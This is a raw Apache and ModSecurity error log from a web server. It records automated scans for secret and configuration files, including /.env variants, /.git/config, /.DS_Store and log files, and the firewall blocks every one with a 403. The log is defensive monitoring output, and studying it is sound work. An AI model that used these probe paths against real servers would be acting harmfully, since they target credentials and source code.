[Tue Dec 02 08:38:24.818318 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/log/error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PGAAAAAU"]
[Tue Dec 02 08:38:24.818750 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/log/error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PGAAAAAU"]
[Tue Dec 02 08:38:24.818958 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/log/error.log"] [unique_id "aS6XcJ0fE9xfoNXam56PGAAAAAU"]
[Tue Dec 02 09:01:12.000989 2025] [authz_core:error] [pid 464904] [client 146.190.63.248:47344] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 02 09:01:15.045957 2025] [:error] [pid 468147] [client 146.190.63.248:48980] [client 146.190.63.248] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aS6cy5vtKXnzGjDKyabjagAAAAk"]
[Tue Dec 02 09:01:15.046223 2025] [:error] [pid 468147] [client 146.190.63.248:48980] [client 146.190.63.248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aS6cy5vtKXnzGjDKyabjagAAAAk"]
[Tue Dec 02 09:01:15.046453 2025] [:error] [pid 468147] [client 146.190.63.248:48980] [client 146.190.63.248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aS6cy5vtKXnzGjDKyabjagAAAAk"]
[Tue Dec 02 09:01:16.038443 2025] [:error] [pid 464252] [client 146.190.63.248:48994] [client 146.190.63.248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6czE1KF2qWt_mCVnZsZAAAAAM"]
[Tue Dec 02 09:01:16.038677 2025] [:error] [pid 464252] [client 146.190.63.248:48994] [client 146.190.63.248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6czE1KF2qWt_mCVnZsZAAAAAM"]
[Tue Dec 02 09:01:16.038864 2025] [:error] [pid 464252] [client 146.190.63.248:48994] [client 146.190.63.248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6czE1KF2qWt_mCVnZsZAAAAAM"]
[Tue Dec 02 09:01:18.045255 2025] [:error] [pid 468147] [client 146.190.63.248:48996] [client 146.190.63.248] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aS6czpvtKXnzGjDKyabjawAAAAk"]
[Tue Dec 02 09:01:18.045526 2025] [:error] [pid 468147] [client 146.190.63.248:48996] [client 146.190.63.248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aS6czpvtKXnzGjDKyabjawAAAAk"]
[Tue Dec 02 09:01:18.045715 2025] [:error] [pid 468147] [client 146.190.63.248:48996] [client 146.190.63.248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aS6czpvtKXnzGjDKyabjawAAAAk"]
[Tue Dec 02 09:30:26.977700 2025] [authz_core:error] [pid 464904] [client 206.189.19.19:34310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 02 09:30:29.979313 2025] [:error] [pid 464291] [client 206.189.19.19:42238] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aS6jpZ0fE9xfoNXam56PNAAAAAU"]
[Tue Dec 02 09:30:29.979578 2025] [:error] [pid 464291] [client 206.189.19.19:42238] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aS6jpZ0fE9xfoNXam56PNAAAAAU"]
[Tue Dec 02 09:30:29.979758 2025] [:error] [pid 464291] [client 206.189.19.19:42238] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aS6jpZ0fE9xfoNXam56PNAAAAAU"]
[Tue Dec 02 09:30:30.979431 2025] [:error] [pid 464253] [client 206.189.19.19:42240] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6jphZeztJm1Yuq3g8lxwAAAAQ"]
[Tue Dec 02 09:30:30.979677 2025] [:error] [pid 464253] [client 206.189.19.19:42240] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6jphZeztJm1Yuq3g8lxwAAAAQ"]
[Tue Dec 02 09:30:30.979870 2025] [:error] [pid 464253] [client 206.189.19.19:42240] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6jphZeztJm1Yuq3g8lxwAAAAQ"]
[Tue Dec 02 09:30:32.984273 2025] [:error] [pid 464905] [client 206.189.19.19:42248] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aS6jqH9wkSayT74AmS7n0QAAAAg"]
[Tue Dec 02 09:30:32.984512 2025] [:error] [pid 464905] [client 206.189.19.19:42248] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aS6jqH9wkSayT74AmS7n0QAAAAg"]
[Tue Dec 02 09:30:32.984684 2025] [:error] [pid 464905] [client 206.189.19.19:42248] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aS6jqH9wkSayT74AmS7n0QAAAAg"]
[Tue Dec 02 14:02:13.370539 2025] [:error] [pid 464249] [client 3.86.112.181:53390] [client 3.86.112.181] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS7jVZ3sbrMrSiOWenoGSgAAAAA"]
[Tue Dec 02 14:02:13.370799 2025] [:error] [pid 464249] [client 3.86.112.181:53390] [client 3.86.112.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS7jVZ3sbrMrSiOWenoGSgAAAAA"]
[Tue Dec 02 14:02:13.370986 2025] [:error] [pid 464249] [client 3.86.112.181:53390] [client 3.86.112.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS7jVZ3sbrMrSiOWenoGSgAAAAA"]
[Wed Dec 03 02:23:59.632293 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS-RL71GWlAyvxqgtfInwQAAAAY"]
[Wed Dec 03 02:23:59.632575 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS-RL71GWlAyvxqgtfInwQAAAAY"]
[Wed Dec 03 02:23:59.632752 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS-RL71GWlAyvxqgtfInwQAAAAY"]
[Wed Dec 03 02:24:00.169171 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS-RML1GWlAyvxqgtfInwgAAAAY"]
[Wed Dec 03 02:24:00.169497 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS-RML1GWlAyvxqgtfInwgAAAAY"]
[Wed Dec 03 02:24:00.169722 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS-RML1GWlAyvxqgtfInwgAAAAY"]
[Wed Dec 03 02:24:00.366641 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aS-RML1GWlAyvxqgtfInwwAAAAY"]
[Wed Dec 03 02:24:00.368590 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aS-RML1GWlAyvxqgtfInwwAAAAY"]
[Wed Dec 03 02:24:00.368786 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aS-RML1GWlAyvxqgtfInwwAAAAY"]
[Wed Dec 03 02:24:00.501979 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aS-RML1GWlAyvxqgtfInxAAAAAY"]
[Wed Dec 03 02:24:00.502272 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aS-RML1GWlAyvxqgtfInxAAAAAY"]
[Wed Dec 03 02:24:00.502513 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aS-RML1GWlAyvxqgtfInxAAAAAY"]
[Wed Dec 03 02:24:00.758164 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aS-RML1GWlAyvxqgtfInxQAAAAY"]
[Wed Dec 03 02:24:00.758457 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aS-RML1GWlAyvxqgtfInxQAAAAY"]
[Wed Dec 03 02:24:00.758655 2025] [:error] [pid 484636] [client 93.123.109.132:49622] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aS-RML1GWlAyvxqgtfInxQAAAAY"]
